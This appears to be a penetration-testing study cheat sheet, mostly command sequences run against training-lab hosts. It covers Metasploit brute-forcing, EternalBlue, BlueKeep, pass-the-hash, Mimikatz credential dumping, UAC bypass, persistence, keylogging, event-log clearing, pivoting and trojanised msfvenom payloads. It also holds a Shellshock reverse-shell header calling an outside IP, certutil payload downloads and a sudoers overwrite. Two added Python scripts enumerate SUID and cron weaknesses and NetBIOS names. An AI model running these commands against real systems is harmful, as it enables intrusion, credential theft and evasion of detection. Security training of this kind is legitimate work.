  msf> use auxiliary/scanner/http/http_login
  msf> set AUTH_URI <dir>             // directory whose credentials you want to brute-force
  msf> unset USERPASS_FILE
  msf> run
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> set VERBOSE false
  msf> run
  msf> use auxiliary/scanner/http/apache_userdir_enum
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> echo "<username>" > user.txt
  msf> use auxiliary/scanner/http/http_login
  msf> set USER_FILE /root/user.txt

MySQL Enumeration   // MySQL - TCP Port 3306
  msf> use auxiliary/scanner/mysql/mysql_version
  msf> use auxiliary/scanner/mysql/mysql_login
  msf> set USERNAME root
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
  msf> set VERBOSE false
  msf> run                            // brute-forces passwords
  // auxiliary/admin/ → these admin modules require credentials
  msf> use auxiliary/admin/mysql/mysql_enum
  msf> set PASSWORD <password>
  msf> set USERNAME root
  msf> run
  msf> use auxiliary/admin/mysql/mysql_sql
  msf> set USERNAME root
  msf> set PASSWORD <password>
  msf> set SQL show databases;
  msf> use auxiliary/scanner/mysql/mysql_schemadump
  msf> set USERNAME root
  msf> set PASSWORD <password>
  bash> mysql -h <IP> -u root -p

SSH Enumeration
  msf> search type:auxiliary name:ssh
  msf> use auxiliary/scanner/ssh/ssh_version
  msf> use auxiliary/scanner/ssh/ssh_login          // password auth
  msf> use auxiliary/scanner/ssh/ssh_login_pubkey   // key-pair auth
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
  msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
  msf> sessions <number>
  > /bin/bash -i
  bash> ls
  msf> use auxiliary/scanner/ssh/ssh_enumusers
  msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt

SMTP Enumeration
  msf> search type:auxiliary name:smtp
  msf> use auxiliary/scanner/smtp/smtp_version
  msf> use auxiliary/scanner/smtp/smtp_enum

Vulnerability Assessment

Frequently Exploited Windows Services
  • Microsoft IIS → Port 80/443 → web server
  • WebDAV → Port 80/443 → HTTP extension that allows clients to update, delete, move & copy files on the web server
  • SMB/CIFS → Port 445 → network file sharing protocol
  • RDP → Port 3389 → remotely authenticate & interact with a Windows system
  • WinRM → Port 5985/5986 → Windows remote management protocol

MSF Vulnerability Scanning
  bash> searchsploit "Microsoft Windows SMB"
  bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
  metasploit-autopwn:
  > wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb   (fetch the raw file, not the GitHub HTML page)
  > mv db_autopwn.rb /usr/share/metasploit-framework/
  msf> load db_autopwn
  msf> db_autopwn -p -t
  msf> db_autopwn -p -t -PI 445
  msf> analyze

MS17-010 SMB Vulnerability (EternalBlue Exploit)
  EternalBlue → collection of Windows vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows system
  Affected versions: Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016
  > nmap -sV -p 445 -O <IP>
  > nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
  > git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
  > cd <DIR>
  > pip install -r requirements.txt
  > cd shellcode && chmod +x shell_prep.sh
  > ./shell_prep.sh   // 1. type Y  2. enter LHOST IP  3. enter LHOST port  4. type 1 (regular CMD shell)  5. type 1 (stageless payload) → sc_x86.bin / sc_x64.bin
  > cd ..
  > chmod +x eternalblue_exploit7.py
  > nc -nvlp 1234
  > python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
  // Method 2
  msf> search eternalblue
  msf> use exploit/windows/smb/ms17_010_eternalblue
  msf> set RHOSTS <IP>

BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)
  Allows attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of
  > sudo nmap -sV -p 3389 <IP>
  msf> search BlueKeep
  msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
  msf> set RHOSTS <IP>
  msf> run
  msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
  msf> set RHOSTS <IP>
  msf> exploit
  (The RCE module needs the TARGET set to the victim's exact build and is unreliable; a failed attempt usually blue-screens the host, so run the scanner module first.)

PassTheHash Attack
  msf> service postgresql start && msfconsole
  msf> search badblue
  msf> use exploit/windows/http/badblue_passthru
  msf> set RHOSTS <IP>
  msf> exploit
  mp> pgrep lsass
  mp> migrate 780
  mp> getuid
  mp> load kiwi
  mp> lsa_dump_sam                    // administrator NTLM creds
  msf> use exploit/windows/smb/psexec
  msf> set LPORT <PORT>
  msf> set RHOSTS <IP>
  msf> set SMBUser Administrator
  msf> set SMBPass <LMHash>:<NTLM Hash>
  msf> set target Native\ upload
  msf> exploit
  // Method 2
  > crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
  > crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"

Shellshock (Bash CVE-2014-6271 Vulnerability)
  Allows an attacker to execute arbitrary commands remotely via Bash, consequently allowing the attacker to obtain access to the target system via a reverse shell.
  > nmap -sV <IP>
  > nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
  > Capture the request in Burp and set the header:
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
  > nc -nvlp 1234
  > User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
  msf> search shellshock
  msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
  msf> set RHOSTS <IP>
  msf> set TARGETURI /gettime.cgi
  msf> exploit

Vulnerability Scanning
  Nessus
  sudo dpkg -i Nessus.deb            // download from the Nessus website
  sudo systemctl start nessusd.service
  WMAP
  msf> setg RHOSTS <IP>
  msf> load wmap
  msf> wmap_sites -a <IP>
  msf> wmap_targets -t http://<IP>
  msf> wmap_sites -l
  msf> wmap_targets -l
  msf> wmap_run -t

Windows Privilege Escalation

Windows Kernel Exploits
  Windows-Exploit-Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
  windows-kernel-exploits: https://github.com/SecWiki/windows-kernel-exploits
  mp> getsystem                       // tries Meterpreter's built-in privilege escalation techniques
  msf> use post/multi/recon/local_exploit_suggester
  msf> set SESSION <Number>
  msf> run

Bypassing User Account Control (UAC)
  In order to bypass UAC, you need access to a user account that is a member of the local Administrators group on the target. UAC bypasses elevate the medium-integrity token of such an account to high integrity; they do not turn a standard user into an administrator.
UACMe: https://github.com/hfiref0x/UACME > net users > net localgroup administrators > setg RHOSTS <IP> > search rejetto > run > sysinfo // 32-bit mp session > pgrep explorer > migrate <ID> > sysinfo // 64-bit mp session > shell > net user > net localgroup administrators > // MSF : UACME > use multi/handler > set payload windows/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT <Port> > run // Create Payload > msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe' // Continue Previous Session > pwd > getuid > getprivs > cd C:\\ > mkdir temp > cd temp > upload backdoor.exe > upload /root/Desktop/tools/UACME/Akagi64.exe > shell > dir > Akagi63.exe 23 C:\\temp\backdoor.exe It will connect to lister > getuid > getprivs > getsystem > hashdump Access Control Impersonation Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system. Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process. Privileges: SeAssignPrimaryToken: This allows a user to impersonate tokens SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges. SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges. 
> nmap <IP> > search rejetto > set RHOSTS <IP> > exploit > sysinfo > pgrep explorer > migrate <ID> > getuid > getprivs > use incognito > list_tokens -u > impersonate_token <Name> > getuid > pgrep explorer > migrate <ID> Alternate Data Streams (ADS) ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS Any file created on an NTFS drive will have two different forks/streams: Data Stream → Default stream that contains data of the file Resource Stream → Typically contains metadata of the file Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection Unattended Windows Setup Config Files: C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Autounattend.xml > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe > python -m SimpleHTTPServer 80 // Windows > cd Desktop > certutil -urlcache -f http://<Kali>/payload.exe payload.exe > msfconsole > use multi/handler > set payload windows/x64/meterpreter/reverse_tcp > set LHOST <IP> > set LPORT 1234 > run // Execute the payload in Windows > search -f unattend.xml > cd C:\\Windows\\Panther > download unattend.xml > vim password.txt > base64 -d password.txt > psexec.py Administrator@<IP> // Enter password // Windows: runas.exe /user:Administrator cmd // Enter password Dumping Hashes with Mimikatz Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory. > nmap -sV <IP> > msfconsole > search badblue > use exploit/windows/http/badblue_passthru > set RHOSTS <IP> > exploit > sysinfo > getuid > pgrep lsass > migrate <ID> > getuid > load kiwi > ? 
// Help Menu
> creds_all // Dump all creds
> lsa_dump_sam
> lsa_dump_secrets
> cd C:\\
> mkdir Temp
> cd Temp
> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
> shell
> dir
> mimikatz.exe
> privilege::debug
> lsadump::sam
> lsadump::secrets
> sekurlsa::logonpasswords

Linux Exploits
FTP
> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd
SSH
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh
SAMBA
SAMBA is a Linux implementation of SMB
SAMBA allows Windows systems to access Linux shares & devices
> nmap -sV <IP>
> hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
> smbmap -H <IP> -u admin -p <password>
> smbclient -L <IP> -U admin
> smbclient //<IP>/shawn -U admin
> ?
> dir
> smbclient //<IP>/nancy -U admin
> get flag
> ls
> cat flag
> smbclient //<IP>/admin -U admin
> tar xzf flag.tar.gz
> cat flag
> enum4linux -a <IP>
> enum4linux -a -u admin -p <password> <IP>

Linux Privilege Escalation
Linux Kernel Exploits
Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester
> sysinfo
> getuid
> shell
> /bin/bash -i
> cat /etc/passwd
> // Quick Download: Linux Exploit Suggester
> chmod +x les.sh
> ./les.sh

Misconfigured Cron Jobs
Cron → Time-based service that runs applications, scripts & other commands repeatedly on a specific schedule
In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the cron job
> whoami
> groups <user>
> cat /etc/passwd
> crontab -l // List crontab for current user
> ls -la
> cd /
> grep -rnw /usr -e "/home/student/message" // find the script that references the file the cron job copies
> cat /tmp/message
> ls -la /usr/local/share/copy.sh // world-writable & run by root's cron job
> cat /usr/local/share/copy.sh
> printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
> sudo su // once the cron job has run the modified script as root

SUID Binaries
SUID → Set Owner User ID permission
This permission provides users with the ability to execute a binary with the permissions of the file owner as opposed to the user that is running the binary (Linux ignores the SUID bit on interpreted scripts; it only takes effect on binaries)
SUID permissions are typically used to provide unprivileged users with the ability to run specific binaries with "root" permissions.
The provision of elevated privileges is limited to the execution of the binary & does not translate to an elevation of the user's own privileges.
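The cron and SUID checks above are done by hand with grep, ls -la and find. The script below is an added example (not from the original notes) that does the same triage in one pass: it lists SUID/SGID binaries, world-writable paths, and cron entries whose referenced scripts the current user can modify. The directory tree, file names (welcome, copy.sh) and crontab text in demo() are constructed to mirror the lab; CRON_FILES is an assumption about a Debian-style layout for a live run.

```python
import os
import re
import stat
import tempfile

# Where system cron jobs live on Debian/Ubuntu-style hosts (assumption for a live run).
CRON_FILES = ["/etc/crontab", "/etc/cron.d", "/var/spool/cron/crontabs"]

# Absolute paths inside a cron command, e.g. /usr/local/share/copy.sh
PATH_RE = re.compile(r"(/[\w./-]+)")


def is_world_writable(path):
    """True if 'others' can write the path (symlinks are ignored, like find -not -type l)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return not stat.S_ISLNK(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)


def find_suid(root):
    """Regular files under root with the SUID or SGID bit set (find / -perm -u=s,g=s)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(p)
    return sorted(hits)


def find_world_writable(root):
    """World-writable files and directories under root (find / -not -type l -perm -o+w)."""
    hits = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            p = os.path.join(dirpath, name)
            if is_world_writable(p):
                hits.append(p)
    return sorted(hits)


def parse_cron_line(line):
    """(user, command) for a system crontab line, or None for blanks, comments and VAR=value.
    System crontabs carry a sixth 'user' field; per-user crontabs do not."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    if line.startswith("@"):                      # @reboot/@daily user command
        fields = line.split(None, 2)
        return (fields[1], fields[2]) if len(fields) == 3 else None
    fields = line.split(None, 6)                  # m h dom mon dow user command
    return (fields[5], fields[6]) if len(fields) == 7 else None


def writable_cron_targets(cron_text):
    """Cron commands whose referenced scripts the current user can change.
    Returns [(user, command, path)]; a hit with user == root is the copy.sh case above."""
    findings = []
    for line in cron_text.splitlines():
        parsed = parse_cron_line(line)
        if not parsed:
            continue
        user, cmd = parsed
        for path in PATH_RE.findall(cmd):
            if os.path.isfile(path) and (os.access(path, os.W_OK) or is_world_writable(path)):
                findings.append((user, cmd, path))
    return findings


def demo():
    """Constructed fixture mirroring the lab: a SUID copy of a binary plus a root cron job
    that runs a world-writable script. Returns the three finding lists."""
    root = tempfile.mkdtemp(prefix="privesc-")
    suid_bin = os.path.join(root, "welcome")
    with open(suid_bin, "wb") as f:
        f.write(b"\x7fELF")                        # only the mode matters for the demo
    os.chmod(suid_bin, 0o4755)                     # -rwsr-xr-x
    script = os.path.join(root, "copy.sh")
    with open(script, "w") as f:
        f.write("#!/bin/bash\ncp /home/student/message /tmp/message\n")
    os.chmod(script, 0o777)                        # anyone can replace the script body
    crontab = ("SHELL=/bin/sh\n"
               "# m h dom mon dow user command\n"
               "* * * * * root " + script + "\n"
               "@daily root /usr/bin/true\n")
    return {"suid": find_suid(root),
            "world_writable": find_world_writable(root),
            "cron": writable_cron_targets(crontab)}


if __name__ == "__main__":
    for key, hits in demo().items():
        print(key, hits)
```

On a real host, call find_suid("/"), find_world_writable("/") and feed the contents of each path in CRON_FILES to writable_cron_targets(); a root entry pointing at a path you can write is exactly the copy.sh situation in the notes.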
> whoami
> groups <user>
> ls -la
> file welcome
> strings welcome // welcome is SUID root & calls "greetings" by relative name
> rm greetings
> cp /bin/bash greetings
> ./welcome
> cat /etc/shadow

Dumping Linux Password Hashes
Prefix:
$1 → MD5 (md5crypt)
$2 → Blowfish (bcrypt)
$5 → SHA-256 (sha256crypt)
$6 → SHA-512 (sha512crypt)
> nmap -sV <IP>
> searchsploit proftpd
> setg RHOSTS <IP>
> search proftpd
> use exploit/unix/ftp/proftpd_133c_backdoor
> show options
> set payload cmd/unix/reverse
> exploit
> /bin/bash -i
> id
> // Background the session (Ctrl+Z)
> sessions
> sessions -u 1
> sysinfo
> getuid
> cat /etc/shadow // Get hash
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> run
// Crack hash
> use auxiliary/analyze/crack_linux
> set SHA512 true
> run

Network-Based Attacks
Firewall Detection & IDS Evasion
> nmap -Pn -sS -F <IP> // -F -> Fast scan (top 100 ports)
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment packets

SMB & NetBIOS Enumeration
NetBIOS → API & a set of network protocols providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
SMB → A network file-sharing protocol that allows computers on a network to share files, printers, & other resources.
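nbtscan, nmblookup -A and Nmap's nbstat.nse all send the same NetBIOS node-status (NBSTAT) query to UDP/137 and read back the host's name table. The code below is an added example (not from the original notes) that builds that query, parses the response, and prints the name table the way nbtscan does. The sample response is constructed for the demo (host DEMO, workgroup SPORTSFOO and the MAC are invented); query_host() sends the real packet.

```python
import socket
import struct

NBSTAT = 0x0021          # RR type for a node status request/response
CLASS_IN = 0x0001
# NetBIOS suffix byte (16th byte of the name) -> service it advertises
SUFFIX = {0x00: "Workstation Service", 0x03: "Messenger Service", 0x20: "File Server Service",
          0x1B: "Domain Master Browser", 0x1C: "Domain Controllers",
          0x1D: "Master Browser", 0x1E: "Browser Service Elections"}


def encode_name(name, suffix=0x00, pad=b" "):
    """RFC 1001 first-level encoding: 15-char name + suffix byte, every byte split into two
    nibbles written as 'A'+nibble, wrapped as a 32-byte label with a zero terminator."""
    raw = name.encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    encoded = b"".join(bytes([0x41 + (b >> 4), 0x41 + (b & 0x0F)]) for b in raw)
    return b"\x20" + encoded + b"\x00"


def build_query(txn_id=0x1337):
    """Node status request for the wildcard name '*' (NUL-padded), as nbtscan sends it."""
    header = struct.pack(">HHHHHH", txn_id, 0x0000, 1, 0, 0, 0)   # flags 0, QDCOUNT 1
    question = encode_name("*", 0x00, pad=b"\x00") + struct.pack(">HH", NBSTAT, CLASS_IN)
    return header + question


def parse_response(data):
    """Parse a NODE STATUS RESPONSE into its name table and the unit's MAC address."""
    txn_id, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a node status response")
    off = 12
    while data[off] != 0:                # skip the length-prefixed RR_NAME labels
        off += 1 + data[off]
    off += 1
    rtype, _rclass, _ttl, _rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT:
        raise ValueError("unexpected RR type %#x" % rtype)
    num_names, off = data[off], off + 1
    names = []
    for _ in range(num_names):
        raw = data[off:off + 16]
        nflags = struct.unpack(">H", data[off + 16:off + 18])[0]
        off += 18
        suffix = raw[15]
        names.append((raw[:15].rstrip(b" \x00").decode("latin-1"), suffix,
                      SUFFIX.get(suffix, "unknown"), bool(nflags & 0x8000)))  # bit 15 = group name
    mac = ":".join("%02x" % b for b in data[off:off + 6])   # STATISTICS starts with UNIT_ID
    return {"txn_id": txn_id, "names": names, "mac": mac}


def build_sample_response(txn_id=0x1337):
    """Constructed reply (not a capture) from a fictional host DEMO in workgroup SPORTSFOO."""
    entries = [(b"DEMO", 0x00, 0x0400), (b"DEMO", 0x20, 0x0400),
               (b"SPORTSFOO", 0x00, 0x8400), (b"SPORTSFOO", 0x1E, 0x8400)]
    table = b"".join(n.ljust(15, b" ") + bytes([s]) + struct.pack(">H", f) for n, s, f in entries)
    stats = bytes.fromhex("00005e0053ff") + b"\x00" * 40          # UNIT_ID (MAC) + zeroed counters
    rdata = bytes([len(entries)]) + table + stats
    header = struct.pack(">HHHHHH", txn_id, 0x8400, 0, 1, 0, 0)    # R=1, AA=1, ANCOUNT 1
    rr = encode_name("*", 0x00, pad=b"\x00") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata))
    return header + rr + rdata


def query_host(ip, timeout=2.0):
    """Live version: send the query to UDP/137 and parse whatever comes back."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_query(), (ip, 137))
        data, _ = s.recvfrom(4096)
    return parse_response(data)


if __name__ == "__main__":
    for name, suffix, service, group in parse_response(build_sample_response())["names"]:
        print("%-15s <%02x> %-8s %s" % (name, suffix, "GROUP" if group else "UNIQUE", service))
```

The suffix byte is the part worth reading: <20> means the host offers SMB shares, <1C> marks a domain controller, and a GROUP entry is the workgroup or domain name rather than a host.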
> cat /etc/hosts
> ping demo.ine.local // reachable: IP1
> ping demo1.ine.local // not reachable: IP2
> nmap demo.ine.local
> whatis nbtscan
> nbtscan <IP/Subnet>
> nmblookup -A <IP1>
> nmap -sU -p 137 <IP1>
> nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
> nmap -sV -p 139,445 demo.ine.local
> ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
> nmap -p445 --script smb-protocols demo.ine.local
> nmap -p445 --script smb-security-mode demo.ine.local
> smbclient -L demo.ine.local // testing for anonymous access -> press Enter at the password prompt
> nmap -p445 --script smb-enum-users demo.ine.local
> nano users.txt // enter all usernames
> hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
> psexec.py administrator@demo.ine.local
> whoami
// MSF
> search psexec
> use exploit/windows/smb/psexec
> set SMBUser <username>
> set SMBPass <password>
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
> sysinfo
> shell
> ping <IP2>
> // Exit
> run autoroute -s <IP2/Subnet> // e.g. /20 -> Meterpreter now routes to that subnet
> background
> search socks
> use auxiliary/server/socks_proxy
> set VERSION 4a // match the version in /etc/proxychains4.conf
> set SRVPORT <ProxychainsPort>
> run
> netstat -antp
// Machine 1
> proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
// MSF
> sessions 1
> shell
> net view <IP2>
> background
> migrate -N explorer.exe
> shell
> net view <IP2>
> net use D: \\<IP2>\Documents
> net use K: \\<IP2>\K$
> dir D:

SNMP Enumeration
> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb

SMB Relay Attack
A type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions
> search smb_relay
> use exploit/windows/smb/smb_relay
> set SRVHOST <IP> // Kali Linux IP - ifconfig
> set LHOST <IP> // Kali Linux IP - ifconfig
> set SMBHOST <IP> // Check lab docs
> run
// New Tab
> echo "<Kali-IP> *.sportsfoo" > dns
> dnsspoof -i eth1 -f dns

Metasploit
MSFVenom
x86 → 32-bit
> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx64.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf
// SHELLCODE
// -i -> Iterations
// -e -> Encoding
// -x -> Inject in file
// -k -> Keep original behavior of file (ex. winrar.exe)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe
// MSF Scripts
> msfconsole -r handler.rc

HTTP File Server (HFS)
> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session

Apache Tomcat Java Server
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp
> set LHOST & LPORT
> set SHELL cmd
> exploit
> // background the session
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe > meterpreter.exe
> sudo python -m SimpleHTTPServer 80
> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir
// Continue
> nano handler.rc
  use multi/handler
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST <Kali-IP>
  set LPORT 1234
  run
> // Save the file
> msfconsole -r handler.rc
> .\meterpreter.exe // Resume the session after running handler.rc
> sysinfo
> getuid

FTP Server
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd_234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1 // or the Kali IP
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SAMBA : File Sharing Service
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check if it's vulnerable
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SSH
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> sessions 1
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2

SMTP
> setg RHOSTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1

Meterpreter
> edit flag1 // Text editor
> download flag1
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Running processes
> migrate <pid>
> sessions -u 1 // Upgrade shell to a Meterpreter session

Windows Post Exploitation Modules
> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list processes
> migrate <pid>
> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Results are stored in the DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run

UAC Bypass
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem // fails while the session runs at medium integrity under UAC
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump

Token Impersonation With Incognito
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <pid>
> getuid

Windows Persistence
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K
> use multi/handler
> set LHOST eth1
> run

Enabling RDP
> use exploit/windows/http/badblue_passthru
> set RHOSTS <IP>
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell
> net user administrator hacker_123321 // Change password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>

Windows Keylogging
> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump

Clearing Windows Event Logs
> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes event logs

Windows Pivoting
> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is on the same subnet as Victim 2
> run autoroute -s <IP>/<range> // e.g. /20
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
